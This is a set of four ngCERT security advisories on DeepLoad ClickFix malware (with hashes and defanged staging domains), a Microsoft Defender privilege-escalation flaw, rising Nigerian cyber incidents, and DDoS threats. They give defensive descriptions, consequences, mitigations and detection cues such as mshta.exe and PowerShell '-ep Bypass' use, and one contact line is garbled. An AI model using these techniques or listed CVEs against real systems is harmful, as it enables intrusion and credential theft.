Advisory ID:   ngCERT-2026-040008

SUMMARY

ngCERT is issuing an alert about DeepLoad malware infections that threaten system integrity and enterprise credentials nationwide. DeepLoad is a fileless Windows malware loader delivered primarily through ClickFix-style social engineering. It employs AI-generated obfuscation, in-memory execution, and advanced persistence mechanisms. Infection of this malware could have implications for immediate credential theft, system compromise, persistent access, browser hijacking, lateral movement through USB and data exfiltration. To mitigate these risks, organisations and individuals are advised to take proactive steps by applying the recommendations captured herein.

DESCRIPTION

DeepLoad malware spreads via ClickFix social engineering, tricking victims with fake browser errors that prompt them to paste malicious PowerShell commands into the Windows Run dialogue. The command downloads and executes an obfuscated loader through mshta.exe. Once running, DeepLoad decrypts shellcode in memory, injects it into trusted processes, and evades detection with AI-generated noise. Persistence is maintained through scheduled tasks and WMI event subscriptions. It can drop a credential stealer (filemanager.exe), install a malicious browser extension, and spread through disguised USB shortcuts. Newer variants employ fileless execution, native API calls, disabled PowerShell history, and randomised artefacts, making detection and cleanup highly challenging.

Damage:      Critical 

Probability:  High

Platform(s):  Windows Systems

CONSEQUENCES

Infection with DeepLoad malware can result in:

1. System compromise and multi-layered persistence.
2. Immediate and ongoing credential theft.
3. Installation of rogue browser extensions and browser data interception.
4. Lateral movement and widespread network/USB infections
5. Reputational damage. 

INDICATORS OF COMPROMISE (IOCs):

1.   File Hashes (SHA256):

     a. 1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d (filemanager.exe – standalone                           credential stealer)

    b. 6AABA685669D779EF8BE8F7F4231096CFAFD0EF386F3897C5E2106C177724FC8 (domain-resolver.js)

    c. AB450927B37E1B68E2BE68832C354AC600E86E2545A904D4CA0EA283F2600CC2 (api-client.js)

2.   Network Indicators:

     a. Staging domains: holiday-updateservice[.]com, forest-entity[.]cc

    b. Supporting infrastructure: hell1-kitty[.]cc

SOLUTION/MITIGATION

To reduce risk and impact, organisations should:

1. Apply timely patches to Windows systems and applications to prevent exploitation of vulnerabilities used for initial infection.
2. Deploy Endpoint Detection and Response (EDR) tools with behavioural analysis to identify fileless infections, APC injection, WMI abuse, and suspicious PowerShell activity.
3. Enable PowerShell Script Block Logging and monitor for -ep Bypass, mshta.exe, and unexpected outbound connections.
4. Regularly audit and remove unauthorised WMI event subscriptions and scheduled tasks; treat removable media from potentially infected systems as compromised.
5. Implement network segmentation, block known malicious domains, and monitor for anomalous traffic to suspicious infrastructure.
6. Train users on ClickFix-style social engineering (never paste commands from browser prompts into Run or PowerShell) and safe browsing practices.    

HYPERLINK

• https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion
• https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
• https://www.securityweek.com/new-deepload-malware-dropped-in-clickfix-attacks/
• https://socprime.com/active-threats/deepload-malware-pairs-clickfix-delivery/

Advisory ID:   ngCERT-2026-040006

SUMMARY

ngCERT has identified a newly disclosed zero-day vulnerability (CVE-2026-33825) affecting the Microsoft Defender Antimalware Platform. The vulnerability was disclosed on 14 April 2026, as part of Microsoft Patch Tuesday updates. This flaw allows threat actors to perform elevation-of-privilege (EoP) attacks, enabling them to bypass standard access controls and gain SYSTEM-level privileges on affected Windows systems. Although exploitation requires prior access to a target machine, this vulnerability poses a significant risk in post-compromise scenarios and is likely to be exploited by advanced cybercriminals to achieve full system control. Accordingly, ngCERT strongly advise government, private organisations, and the general public to urgently apply the relevant security updates to mitigate potential exploitation.

DESCRIPTION

The vulnerability exists within the Microsoft Defender Antimalware Platform due to insufficient access-control granularity (CWE-1220). This weakness allows improper handling of privileged operations within Defender components. An attacker with local access to a system can exploit this flaw by interacting with vulnerable Defender processes or services in a way that bypasses intended permission boundaries. Successful exploitation results in privilege escalation to the SYSTEM level, the highest privilege tier in Windows environments. Once elevated, the attacker can execute arbitrary code, manipulate system processes, disable security controls, and establish persistent access. This vulnerability is particularly dangerous because Microsoft Defender operates with elevated privileges by default, making it an attractive target for attackers seeking to expand their control after initial compromise. Although the vulnerability does not allow direct remote exploitation, it can be combined with other attack vectors such as phishing, malware infection, or remote code execution to achieve full system compromise.

Damage:      Critical 

Probability:  High

Platform(s):  Windows systems

CONSEQUENCES

Successful exploitation of the vulnerability could lead to:

1. Privilege escalation.
2. Security control bypass.
3. Persistence.
4. Credential theft and lateral movement.
5. Full system compromise. 

SOLUTION/MITIGATION

The following mitigations are strongly recommended:

1. Apply Microsoft Security Updates Immediately.
2. Ensure Defender Platform is Up to Date.
3. Limit Local Access.
4. Enable Endpoint Detection and Response (EDR).
5. Monitor Defender Services.
6. Implement Application Control Policies.
7. Conduct Regular Patch Management.
8. User Awareness and Phishing Protection    

HYPERLINK

• https://cyberpress.org/poc-exploit-released-for-microsoft-defender-0-day-vulnerability/
• https://undercodetesting.com/microsoft-defender-zero-day-cve-2026-33825-exposed-privilege-escalation-unleashed-via-bluehammer-exploit-video/
• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825 

Advisory ID:   ngCERT-2026-040007

SUMMARY

ngCERT has observed a significant rise in high-impact cybersecurity incidents affecting organisations across multiple sectors within Nigeria, driven by phishing, ransomware, business email compromise (BEC), and data breaches. These threats are increasingly enabled by “as-a-service” cybercrime models and AI-driven techniques, allowing threat actors to scale operations and exploit weak security controls across the ecosystem. Private and public sector organisations, particularly the Critical National Information Infrastructure (CNII), are advised to strengthen their cybersecurity posture and remediate identified vulnerabilities urgently.

DESCRIPTION

The surge in cybersecurity incidents in Nigeria reveals a pattern of high-frequency and increasingly sophisticated attacks targeting public and private sector organisations. Threat actors are leveraging phishing campaigns, credential harvesting, ransomware deployment, and exploitation of unpatched systems to gain unauthorised access to networks. The proliferation of phishing-as-a-service and ransomware-as-a-service platforms has lowered the barrier to entry for cybercriminals, enabling coordinated and large-scale attacks. Additionally, the use of automation and artificial intelligence has enhanced cybercriminals’ ability to conduct convincing social engineering, evade detection, and exploit vulnerabilities more efficiently. These threats disproportionately affect sectors such as financial services, telecommunications, government institutions, healthcare, and other critical National infrastructures, where data sensitivity and system availability are mission-critical. Many of these incidents are linked to common weaknesses, including poor identity and access management, lack of multi-factor authentication, inadequate patching, and low user awareness and staff training.

Damage:      Critical 

Probability:  High

Platform(s):  Web Applications, Cloud Services and Email

CONSEQUENCES

If successfully exploited, these cybersecurity threats may result in:

1. Financial losses due to fraud, ransomware payments, and incident response costs.
2. Operational disruption, including system downtime and service outages.
3. Unauthorized access to systems and compromise of sensitive data.
4. Data breaches/exfiltration leading to privacy violations and regulatory penalties.
5. Reputational damage and erosion of customer and stakeholder trust.
6. Compromise of critical infrastructure, with potential national security implications. 

SOLUTION/MITIGATION

ngCERT recommends the following:

1. Enforce multi-factor authentication (MFA) across all critical systems and services.
2.  Implement endpoint detection and response (EDR/XDR) and continuous network monitoring. 
3. Regularly patch and update systems, applications, and network devices.
4.  Adopt a Zero Trust security model and enforce least-privilege access controls.
5. Conduct regular vulnerability assessments and penetration testing.
6. Strengthen employee cybersecurity awareness through training and phishing simulations.
7.  Encrypt sensitive data and maintain secure, offline backups to mitigate ransomware risks.
8. Organisations are further advised to promptly report confirmed incidents to " data-linkindex="0"> or 090 5555 4499 for timely support and coordinated response in line with National Cybersecurity Policy Strategy 2015 (AsAmended 2024).    

HYPERLINK

• https://businessamlive.com/nigeria-leads-africa-in-cyberattacks-with-4701-weekly-hits-per-organisation/
• https://nairametrics.com/2026/03/14/interpol-shuts-45000-malicious-ip-addresses-in-operation-involving-nigeria-others/#google_vignette 

Advisory ID:   ngCERT-2026-040009

SUMMARY

ngCERT alerts all critical sectors to the persistent and escalating threat of Distributed Denial-of-Service (DDoS) attacks within Nigeria's cyberspace. Threat actors are leveraging botnets, amplification techniques, and exploitation of known vulnerabilities to disrupt the availability of essential services within government and private systems. These attacks are increasingly multi-vector and may be combined with other malicious activities, posing significant risks to national resilience and economic stability. Organisations are strongly advised to review this advisory, align it with their DDoS preparedness posture, and ensure it aligns with national incident response frameworks.

DESCRIPTION

A DDoS attack is a coordinated cyber operation in which multiple compromised systems, often forming botnets of infected servers, endpoints, and Internet of Things (IoT) devices, are used to overwhelm a target system, network, or application with excessive traffic, thereby exhausting its resources and rendering services unavailable to legitimate users. These attacks may manifest as volumetric floods that saturate bandwidth, protocol-based attacks that exploit weaknesses in network layers, or application-layer attacks that mimic legitimate user requests to evade detection. Threat actors frequently exploit known vulnerabilities such as CVE-2018-10561, CVE-2021-44228, CVE-2019-19781, CVE-2018-7600, and CVE-2020-25705 to compromise systems and expand botnet infrastructure, while also employing reflection and amplification techniques (e.g., DNS, NTP, Memcached) to significantly magnify attack traffic.

Damage:      Critical 

Probability:  High (CVSS Score 6.6 -10.0)

Platform(s):  All web Domain

CONSEQUENCES

If successfully exploited, this campaign may result in:

1. Disruption of critical services and prolonged system downtime.
2. Financial losses due to operational interruption and mitigation costs.
3. Degradation of national critical infrastructure resilience.
4. Reputational damage and erosion of public trust.
5. Exploitation as a diversion for ransomware or data exfiltration attacks.
6. Exposure to regulatory and compliance sanctions. 

SOLUTION/MITIGATION

ngCERT recommends the following:

1. Activate incident response and escalate internally.
2. Engage ISPs for traffic filtering and mitigation.
3. Enable DDoS protection (scrubbing, rate limiting, filtering).
4. Block malicious IPs and restrict non-essential traffic.
5. Patch vulnerabilities, including CVE-2021-44228, CVE-2019-19781, and CVE-2018-7600.
6. Harden systems and disable unused services.
7.  Deploy Web Application Firewalls and Intrusion Prevention Systems, and anti-DDoS solutions.
8. Implement anti-spoofing per Internet Engineering Task Force (IETF) Best Current Practices 38.
9. Ensure redundancy, load balancing, and auto-scaling.
10. Monitor traffic continuously and detect anomalies.
11. Report any incidents to ngCERT and share IOCs.    

HYPERLINK

• https://www.ncsc.gov.uk/collection/denial-service-dos-guidance-collection
• https://www.proofpoint.com/au/threat-reference/ddos
• https://www.a10networks.com/blog/5-most-famous-ddos-attacks/ 
• https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/